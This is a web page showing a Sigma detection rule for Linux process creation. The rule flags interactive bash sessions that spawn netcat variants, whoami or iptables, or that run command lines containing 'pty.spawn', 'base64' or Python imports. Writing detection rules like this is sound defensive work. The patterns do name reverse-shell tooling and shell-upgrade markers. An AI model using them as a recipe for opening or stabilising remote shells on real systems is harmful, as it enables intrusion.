Detectionmediumtest

Interactive Bash Suspicious Children

Detects suspicious interactive bash as a parent to rather uncommon child processes

Convert In Phoenix Studio

Open this Sigma rule in the converter with the YAML preloaded and ready for backend selection.

Launch

Florian Roth (Nextron Systems)Created Mon Mar 14ea3ecad2-db86-4a89-ad0b-132a10d2db55linux

Log Source

LinuxProcess Creation

ProductLinux← raw: linux

CategoryProcess Creation← raw: process_creation

Events generated when a new process is spawned on the system. Covers command-line arguments, parent/child relationships, and process metadata.

Detection Logic

detection:
    selection:
        ParentCommandLine: 'bash -i'
    anomaly1:
        CommandLine|contains:
            - '-c import '
            - 'base64'
            - 'pty.spawn'
    anomaly2:
        Image|endswith:
            - 'whoami'
            - 'iptables'
            - '/ncat'
            - '/nc'
            - '/netcat'
    condition: selection and 1 of anomaly*

False Positives

Legitimate software that uses these patterns

References

Resolving title…

Internal Research

MITRE ATT&CK

Tactics

TA0002 · Execution TA0005 · Defense Evasion

Techniques

T1036 · Masquerading

Sub-techniques

T1059.004 · Unix Shell

Rule Metadata

Rule ID

ea3ecad2-db86-4a89-ad0b-132a10d2db55

Status

test

Level

medium

Type

Detection

Created

Mon Mar 14

Author

Florian Roth (Nextron Systems)

Path

rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml

Raw Tags

attack.executionattack.defense-evasionattack.t1059.004attack.t1036

View on GitHub